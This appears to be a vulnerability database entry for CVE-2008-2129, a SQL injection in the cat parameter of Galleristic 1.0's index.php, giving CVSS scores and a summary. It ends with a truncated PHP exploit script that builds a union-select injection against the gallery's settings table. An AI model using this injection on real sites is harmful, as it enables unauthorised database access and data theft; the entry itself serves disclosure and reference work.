6.8
CVSSv2

CVE-2008-2129

Published: 09/05/2008 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in Galleristic 1.0, when magic_quotes_gpc is disabled, allows remote malicious users to execute arbitrary SQL commands via the cat parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

cine galleristic 1.0

Exploits

<?php # # Name : Galleristic v10 (indexphp cat) Remote SQL Injection Exploit # Author : cOndemned # Note : works only when magic_quotes_gpc = off # Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;* # function exploit($target, $v) { $injection = "/indexphp?cat='-1+union+select+value+from+gallery_settings+whe ...